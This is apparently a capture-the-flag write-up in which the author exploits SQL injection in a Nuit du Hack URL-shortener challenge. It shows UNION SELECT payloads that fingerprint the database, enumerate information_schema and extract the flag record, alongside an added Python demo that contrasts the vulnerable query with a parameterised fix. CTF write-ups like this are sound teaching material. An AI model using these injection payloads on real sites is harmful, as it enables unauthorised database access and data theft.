
According to the challenge description, http://sci.nuitduhack.com was a URL shortening service.

After reading up on how these services usually work, I found two "common" practices.

The first is to insert the URL into the database and then convert the ID of that record to Base36 (letters a-z, digits 0-9) or some other custom encoding, using the result as the alias. But since the alias in the link we were given contained uppercase letters, lowercase letters and digits, the transformation would have to be Base62 or some other scheme for mapping aliases to URLs. Base62 didn't give us any results, so we moved on to the second way of mapping.

That is to store the alias and the URL in separate columns of the database. The alias then takes part in an SQL query that could be prone to SQL injection, and that would be our way in.

Testing this idea with

http://sci.nuitduhack.com/' UNION SELECT @@version-- a%%%

gave us the first result: the database version was returned in place of the URL, so the alias was being passed into the query unfiltered.
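To show why the alias lookup above leaks database output, here is an added example (not the challenge's code) that rebuilds the writeup's shortner table with its id, alias and url columns in an in-memory SQLite database as a stand-in for MySQL, and puts the string-concatenated lookup beside a hardened one that validates the alias alphabet and binds it as a parameter. The table contents, the ALIAS_RE pattern and the 32-character bound are assumptions for the demo.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the challenge's "shortner" table
# (columns id, alias, url are the ones the writeup recovered).
SCHEMA = [
    "CREATE TABLE shortner (id INTEGER PRIMARY KEY, alias TEXT UNIQUE, url TEXT)",
    "INSERT INTO shortner VALUES (33, 'f69148e2', 'https://www.google.com')",
    "INSERT INTO shortner VALUES (40, 'mMVzJ8Qj', 'http://sci.nuitduhack.com/mMVzJ8Qj/flag.txt')",
]


def make_db():
    conn = sqlite3.connect(":memory:")
    for stmt in SCHEMA:
        conn.execute(stmt)
    return conn


def resolve_vulnerable(conn, alias):
    # The pattern the writeup exploits: the alias is spliced into the SQL
    # text, so a quote in it ends the string literal and the rest is parsed
    # as SQL (a UNION can then return arbitrary columns in place of url).
    row = conn.execute(
        f"SELECT url FROM shortner WHERE alias='{alias}'").fetchone()
    return row[0] if row else None


# Assumed alias policy: Base62 characters only, bounded length.
ALIAS_RE = re.compile(r"[A-Za-z0-9]{1,32}")


def resolve_safe(conn, alias):
    # Defense in depth: reject anything outside the alias alphabet, then
    # bind the value as a parameter so it can never become SQL syntax.
    if not ALIAS_RE.fullmatch(alias):
        return None
    row = conn.execute(
        "SELECT url FROM shortner WHERE alias=?", (alias,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # SQLite's equivalent of the @@version probe from the writeup.
    probe = "' UNION SELECT sqlite_version()-- a"
    print("vulnerable:", resolve_vulnerable(db, probe))  # a version string, not a URL
    print("hardened:  ", resolve_safe(db, probe))        # None
```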

Now we just had to find the table and column names.

Some queries to information_schema did the trick:

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 0,1-- a

returns shortner id

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 1,1-- a

returns shortner alias

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 2,1-- a

returns shortner url

Next we had to find out how many ids were in the table.
Asking the polite database

http://sci.nuitduhack.com/' UNION SELECT CONCAT(min(id),' ',max(id),' ',count(*)) from shortner-- a

answered with 33 43 11, so there are 11 records in the table, with ids running from 33 up to 43.
So there was no need for a brute-forcer to get all the records.

The precious flag was in id 40:

http://sci.nuitduhack.com/' UNION SELECT CONCAT(url,' ',alias) FROM shortner WHERE id=40-- a


http://sci.nuitduhack.com/mMVzJ8Qj/flag.txt 5867hjgjhgffdedeseddf7967

b92b5e7094c7ffb35a526c9eaa6fab0a



Bonus URLs:

http://sci.nuitduhack.com/f69148e2 Google

http://sci.nuitduhack.com/7e3aacb2 http://www.hackerzvoice.com

http://sci.nuitduhack.com/1596a271 http://www.bonjourmadame.fr

http://sci.nuitduhack.com/9d0e9373 http://www.bonjourvoisine.fr

http://sci.nuitduhack.com/83df9275 http://www.lkcd.net :?

http://sci.nuitduhack.com/732c1d61 https://www.google.fr/search?q=the+answer+to+life+the+universe+and+everything

http://sci.nuitduhack.com/342d1fff CTF Ranking

http://sci.nuitduhack.com/zomgwtf Rickrolling ;-)

http://sci.nuitduhack.com/trololololololololololololo http://trololololololololololo.com/

http://sci.nuitduhack.com/admin-backend-full WTF !?